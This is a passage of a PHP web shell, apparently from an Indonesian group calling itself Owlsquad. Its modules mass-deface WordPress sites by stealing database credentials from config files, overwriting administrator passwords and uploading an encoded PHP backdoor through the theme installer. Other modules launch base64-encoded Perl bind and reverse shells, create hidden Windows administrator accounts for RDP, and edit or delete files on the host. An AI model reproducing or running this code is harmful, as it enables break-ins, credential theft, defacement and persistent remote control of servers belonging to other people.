1366.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1367.             $post = array(
1368.                    "log" => "$userr",
1369.                    "pwd" => "$pass",
1370.                    "rememberme" => "forever",
1371.                    "wp-submit" => "$wp_submit",
1372.                    "redirect_to" => "$web",
1373.                    "testcookie" => "1",
1374.                    );
1375.             $ch = curl_init($cek);
1376.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1377.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1378.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1379.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1380.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1381.                   curl_setopt($ch, CURLOPT_POST, 1);
1382.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1383.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1384.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1385.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1386.             $data = curl_exec($ch);
1387.                   curl_close($ch);
1388.             return $data;
1389.         }
1390.         $scan = $_POST['link_config'];
1391.         $link_config = scandir($scan);
1392.         $script = htmlspecialchars($_POST['script']);
1393.         $user = "Owlsquad";
1394.         $pass = "Owlsquad";
1395.         $passx = md5($pass);
1396.         foreach($link_config as $dir_config) {
1397.             if(!is_file("$scan/$dir_config")) continue;
1398.             $config = file_get_contents("$scan/$dir_config");
1399.             if(preg_match("/WordPress/", $config)) {
1400.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1401.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1402.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1403.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1404.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1405.                 $prefix = $dbprefix."users";
1406.                 $option = $dbprefix."options";
1407.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1408.                 $db = mysql_select_db($dbname);
1409.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1410.                 $result = mysql_fetch_array($q);
1411.                 $id = $result[ID];
1412.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1413.                 $result2 = mysql_fetch_array($q2);
1414.                 $target = $result2[option_value];
1415.                 if($target == '') {                
1416.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1417.                 } else {
1418.                     echo "[+] $target <br>";
1419.                 }
1420.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1421.                 if(!$conn OR !$db OR !$update) {
1422.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1423.                     mysql_close($conn);
1424.                 } else {
1425.                     $site = "$target/wp-login.php";
1426.                     $site2 = "$target/wp-admin/theme-install.php?upload";
1427.                     $b1 = anucurl($site2);
1428.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1429.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1430.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1431.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1432.                     $www = "m.php";
1433.                     $fp5 = fopen($www,"w");
1434.                     fputs($fp5,$upload3);
1435.                     $post2 = array(
1436.                             "_wpnonce" => "$anu2",
1437.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1438.                             "themezip" => "@$www",
1439.                             "install-theme-submit" => "Install Now",
1440.                             );
1441.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1442.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1443.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1444.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1445.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1446.                           curl_setopt($ch, CURLOPT_POST, 1);
1447.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1448.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1449.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1450.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1451.                     $data3 = curl_exec($ch);
1452.                           curl_close($ch);
1453.                     $y = date("Y");
1454.                     $m = date("m");
1455.                     $namafile = "id.php";
1456.                     $fpi = fopen($namafile,"w");
1457.                     fputs($fpi,$script);
1458.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1459.                            curl_setopt($ch6, CURLOPT_POST, true);
1460.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1461.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1462.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1463.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1464.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1465.                     $postResult = curl_exec($ch6);
1466.                            curl_close($ch6);
1467.                     $as = "$target/k.php";
1468.                     $bs = anucurl($as);
1469.                     if(preg_match("#$script#is", $bs)) {
1470.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1471.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1472.                         } else {
1473.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
1474.                         echo "[!!] coba aja manual: <br>";
1475.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1476.                         echo "[+] username: <font color=lime>$user</font><br>";
1477.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
1478.                         }
1479.                     mysql_close($conn);
1480.                 }
1481.             }
1482.         }
1483.     } else {
1484.         echo "<center><h1>WordPress Auto Deface</h1>
1485.         <form method='post'>
1486.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1487.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Owlsquad required><br>
1488.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1489.         </form>
1490.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1491.         </center>";
1492.     }
1493. } elseif($_GET['do'] == 'auto_dwp2') {
1494.     if($_POST['auto_deface_wp']) {
1495.         function anucurl($sites) {
1496.             $ch = curl_init($sites);
1497.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1498.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1499.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1500.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1501.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1502.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1503.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1504.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1505.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1506.             $data = curl_exec($ch);
1507.                   curl_close($ch);
1508.             return $data;
1509.         }
1510.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1511.             $post = array(
1512.                    "log" => "$userr",
1513.                    "pwd" => "$pass",
1514.                    "rememberme" => "forever",
1515.                    "wp-submit" => "$wp_submit",
1516.                    "redirect_to" => "$web",
1517.                    "testcookie" => "1",
1518.                    );
1519.             $ch = curl_init($cek);
1520.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1521.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1522.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1523.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1524.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1525.                   curl_setopt($ch, CURLOPT_POST, 1);
1526.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1527.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1528.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1529.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1530.             $data = curl_exec($ch);
1531.                   curl_close($ch);
1532.             return $data;
1533.         }
1534.         $link = explode("\r\n", $_POST['link']);
1535.         $script = htmlspecialchars($_POST['script']);
1536.         $user = "Owlsquad";
1537.         $pass = "Owlsquad";
1538.         $passx = md5($pass);
1539.         foreach($link as $dir_config) {
1540.             $config = anucurl($dir_config);
1541.             $dbhost = ambilkata($config,"DB_HOST', '","'");
1542.             $dbuser = ambilkata($config,"DB_USER', '","'");
1543.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1544.             $dbname = ambilkata($config,"DB_NAME', '","'");
1545.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
1546.             $prefix = $dbprefix."users";
1547.             $option = $dbprefix."options";
1548.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1549.             $db = mysql_select_db($dbname);
1550.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1551.             $result = mysql_fetch_array($q);
1552.             $id = $result[ID];
1553.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1554.             $result2 = mysql_fetch_array($q2);
1555.             $target = $result2[option_value];
1556.             if($target == '') {                
1557.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1558.             } else {
1559.                 echo "[+] $target <br>";
1560.             }
1561.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1562.             if(!$conn OR !$db OR !$update) {
1563.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1564.                 mysql_close($conn);
1565.             } else {
1566.                 $site = "$target/wp-login.php";
1567.                 $site2 = "$target/wp-admin/theme-install.php?upload";
1568.                 $b1 = anucurl($site2);
1569.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1570.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1571.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1572.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1573.                 $www = "m.php";
1574.                 $fp5 = fopen($www,"w");
1575.                 fputs($fp5,$upload3);
1576.                 $post2 = array(
1577.                         "_wpnonce" => "$anu2",
1578.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1579.                         "themezip" => "@$www",
1580.                         "install-theme-submit" => "Install Now",
1581.                         );
1582.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1583.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1584.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1585.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1586.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1587.                       curl_setopt($ch, CURLOPT_POST, 1);
1588.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1589.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1590.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1591.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1592.                 $data3 = curl_exec($ch);
1593.                       curl_close($ch);
1594.                 $y = date("Y");
1595.                 $m = date("m");
1596.                 $namafile = "id.php";
1597.                 $fpi = fopen($namafile,"w");
1598.                 fputs($fpi,$script);
1599.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1600.                        curl_setopt($ch6, CURLOPT_POST, true);
1601.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1602.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1603.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1604.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1605.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1606.                 $postResult = curl_exec($ch6);
1607.                        curl_close($ch6);
1608.                 $as = "$target/k.php";
1609.                 $bs = anucurl($as);
1610.                 if(preg_match("#$script#is", $bs)) {
1611.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1612.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1613.                     } else {
1614.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
1615.                     echo "[!!] coba aja manual: <br>";
1616.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1617.                     echo "[+] username: <font color=lime>$user</font><br>";
1618.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
1619.                     }
1620.                 mysql_close($conn);
1621.             }
1622.         }
1623.     } else {
1624.         echo "<center><h1>WordPress Auto Deface V.2</h1>
1625.         <form method='post'>
1626.         Link Config: <br>
1627.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1628.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by OwlSquad' required><br>
1629.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1630.         </form></center>";
1631.     }
1632. } elseif($_GET['do'] == 'network') {
1633.     echo "<form method='post'>
1634.     <u>Bind Port:</u> <br>
1635.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1636.     <input type='submit' name='sub_bp' value='>>'>
1637.     </form>
1638.     <form method='post'>
1639.     <u>Back Connect:</u> <br>
1640.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1641.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1642.     <input type='submit' name='sub_bc' value='>>'>
1643.     </form>";
1644.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1645.     if(isset($_POST['sub_bp'])) {
1646.         $f_bp = fopen("/tmp/bp.pl", "w");
1647.         fwrite($f_bp, base64_decode($bind_port_p));
1648.         fclose($f_bp);
1649.  
1650.         $port = $_POST['port_bind'];
1651.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1652.         sleep(1);
1653.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1654.         unlink("/tmp/bp.pl");
1655.     }
1656.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1657.     if(isset($_POST['sub_bc'])) {
1658.         $f_bc = fopen("/tmp/bc.pl", "w");
1659.         fwrite($f_bc, base64_decode($bind_connect_p));
1660.         fclose($f_bc);
1661.  
1662.         $ipbc = $_POST['ip_bc'];
1663.         $port = $_POST['port_bc'];
1664.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1665.         sleep(1);
1666.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1667.         unlink("/tmp/bc.pl");
1668.     }
1669. } elseif($_GET['do'] == 'krdp_shell') {
1670.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1671.         if($_POST['create']) {
1672.             $user = htmlspecialchars($_POST['user']);
1673.             $pass = htmlspecialchars($_POST['pass']);
1674.             if(preg_match("/$user/", exe("net user"))) {
1675.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1676.             } else {
1677.                 $add_user   = exe("net user $user $pass /add");
1678.                 $add_groups1 = exe("net localgroup Administrators $user /add");
1679.                 $add_groups2 = exe("net localgroup Administrator $user /add");
1680.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
1681.                 echo "[ RDP ACCOUNT INFO ]<br>
1682.                 ------------------------------<br>
1683.                 IP: <font color=lime>".$ip."</font><br>
1684.                 Username: <font color=lime>$user</font><br>
1685.                 Password: <font color=lime>$pass</font><br>
1686.                 ------------------------------<br><br>
1687.                 [ STATUS ]<br>
1688.                 ------------------------------<br>
1689.                 ";
1690.                 if($add_user) {
1691.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1692.                 } else {
1693.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
1694.                 }
1695.                 if($add_groups1) {
1696.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1697.                 } elseif($add_groups2) {
1698.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1699.                 } elseif($add_groups3) {
1700.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1701.                 } else {
1702.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1703.                 }
1704.                 echo "------------------------------<br>";
1705.             }
1706.         } elseif($_POST['s_opsi']) {
1707.             $user = htmlspecialchars($_POST['r_user']);
1708.             if($_POST['opsi'] == '1') {
1709.                 $cek = exe("net user $user");
1710.                 echo "Checking username <font color=lime>$user</font> ....... ";
1711.                 if(preg_match("/$user/", $cek)) {
1712.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
1713.                     ------------------------------<br><br>
1714.                     <pre>$cek</pre>";
1715.                 } else {
1716.                     echo "[ <font color=red>belum ada</font> ]";
1717.                 }
1718.             } elseif($_POST['opsi'] == '2') {
1719.                 $cek = exe("net user $user Owlsquad");
1720.                 if(preg_match("/$user/", exe("net user"))) {
1721.                     echo "[change password: <font color=lime>Owlsquad</font>] -> ";
1722.                     if($cek) {
1723.                         echo "<font color=lime>Berhasil</font>";
1724.                     } else {
1725.                         echo "<font color=red>Gagal</font>";
1726.                     }
1727.                 } else {
1728.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1729.                 }
1730.             } elseif($_POST['opsi'] == '3') {
1731.                 $cek = exe("net user $user /DELETE");
1732.                 if(preg_match("/$user/", exe("net user"))) {
1733.                     echo "[remove user: <font color=lime>$user</font>] -> ";
1734.                     if($cek) {
1735.                         echo "<font color=lime>Berhasil</font>";
1736.                     } else {
1737.                         echo "<font color=red>Gagal</font>";
1738.                     }
1739.                 } else {
1740.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1741.                 }
1742.             } else {
1743.                 //
1744.             }
1745.         } else {
1746.             echo "-- Create RDP --<br>
1747.             <form method='post'>
1748.             <input type='text' name='user' placeholder='username' value='Owlsquad' required>
1749.             <input type='text' name='pass' placeholder='password' value='Owlsquad' required>
1750.             <input type='submit' name='create' value='>>'>
1751.             </form>
1752.             -- Option --<br>
1753.             <form method='post'>
1754.             <input type='text' name='r_user' placeholder='username' required>
1755.             <select name='opsi'>
1756.             <option value='1'>Cek Username</option>
1757.             <option value='2'>Ubah Password</option>
1758.             <option value='3'>Hapus Username</option>
1759.             </select>
1760.             <input type='submit' name='s_opsi' value='>>'>
1761.             </form>
1762.             ";
1763.         }
1764.     } else {
1765.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1766.     }
1767. } elseif($_GET['act'] == 'newfile') {
1768.     if($_POST['new_save_file']) {
1769.         $newfile = htmlspecialchars($_POST['newfile']);
1770.         $fopen = fopen($newfile, "a+");
1771.         if($fopen) {
1772.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1773.         } else {
1774.             $act = "<font color=red>permission denied</font>";
1775.         }
1776.     }
1777.     echo $act;
1778.     echo "<form method='post'>
1779.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1780.     <input type='submit' name='new_save_file' value='Submit'>
1781.     </form>";
1782. } elseif($_GET['act'] == 'newfolder') {
1783.     if($_POST['new_save_folder']) {
1784.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1785.         if(!mkdir($new_folder)) {
1786.             $act = "<font color=red>permission denied</font>";
1787.         } else {
1788.             $act = "<script>window.location='?dir=".$dir."';</script>";
1789.         }
1790.     }
1791.     echo $act;
1792.     echo "<form method='post'>
1793.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1794.     <input type='submit' name='new_save_folder' value='Submit'>
1795.     </form>";
1796. } elseif($_GET['act'] == 'rename_dir') {
1797.     if($_POST['dir_rename']) {
1798.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1799.         if($dir_rename) {
1800.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1801.         } else {
1802.             $act = "<font color=red>permission denied</font>";
1803.         }
1804.     echo "".$act."<br>";
1805.     }
1806.     echo "<form method='post'>
1807.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1808.     <input type='submit' name='dir_rename' value='rename'>
1809.     </form>";
1810. } elseif($_GET['act'] == 'delete_dir') {
1811.     if(is_dir($dir)) {
1812.         if(is_writable($dir)) {
1813.             @rmdir($dir);
1814.             @exe("rm -rf $dir");
1815.             @exe("rmdir /s /q $dir");
1816.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1817.         } else {
1818.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
1819.         }
1820.     }
1821.     echo $act;
1822. } elseif($_GET['act'] == 'view') {
1823.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1824.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1825. } elseif($_GET['act'] == 'edit') {
1826.     if($_POST['save']) {
1827.         $save = file_put_contents($_GET['file'], $_POST['src']);
1828.         if($save) {
1829.             $act = "<font color=lime>Saved!</font>";
1830.         } else {
1831.             $act = "<font color=red>permission denied</font>";
1832.         }
1833.     echo "".$act."<br>";
1834.     }
1835.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1836.     echo "<form method='post'>
1837.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1838.     <input type='submit' value='Save' name='save' style='width: 500px;'>
1839.     </form>";
1840. } elseif($_GET['act'] == 'rename') {
1841.     if($_POST['do_rename']) {
1842.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1843.         if($rename) {
1844.             $act = "<script>window.location='?dir=".$dir."';</script>";
1845.         } else {
1846.             $act = "<font color=red>permission denied</font>";
1847.         }
1848.     echo "".$act."<br>";
1849.     }
1850.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1851.     echo "<form method='post'>
1852.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1853.     <input type='submit' name='do_rename' value='rename'>
1854.     </form>";
1855. } elseif($_GET['act'] == 'delete') {
1856.     $delete = unlink($_GET['file']);
1857.     if($delete) {
1858.         $act = "<script>window.location='?dir=".$dir."';</script>";
1859.     } else {
1860.         $act = "<font color=red>permission denied</font>";
1861.     }
1862.     echo $act;
1863. } else {
1864.     if(is_dir($dir) === true) {
1865.         if(!is_readable($dir)) {
1866.             echo "<font color=red>can't open directory. ( not readable )</font>";
1867.         } else {
1868.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1869.             <tr>
1870.             <th class="th_home"><center>Name</center></th>
1871.             <th class="th_home"><center>Type</center></th>
1872.             <th class="th_home"><center>Size</center></th>
1873.             <th class="th_home"><center>Last Modified</center></th>
1874.             <th class="th_home"><center>Owner/Group</center></th>
1875.             <th class="th_home"><center>Permission</center></th>
1876.             <th class="th_home"><center>Action</center></th>
1877.             </tr>';
1878.             $scandir = scandir($dir);
1879.             foreach($scandir as $dirx) {
1880.                 $dtype = filetype("$dir/$dirx");
1881.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1882.                 if(function_exists('posix_getpwuid')) {
1883.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
1884.                     $downer = $downer['name'];
1885.                 } else {
1886.                     //$downer = $uid;
1887.                     $downer = fileowner("$dir/$dirx");
1888.                 }
1889.                 if(function_exists('posix_getgrgid')) {
1890.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
1891.                     $dgrp = $dgrp['name'];
1892.                 } else {
1893.                     $dgrp = filegroup("$dir/$dirx");
1894.                 }
1895.                 if(!is_dir("$dir/$dirx")) continue;
1896.                 if($dirx === '..') {
1897.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1898.                 } elseif($dirx === '.') {
1899.                     $href = "<a href='?dir=$dir'>$dirx</a>";
1900.                 } else {
1901.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1902.                 }
1903.                 if($dirx === '.' || $dirx === '..') {
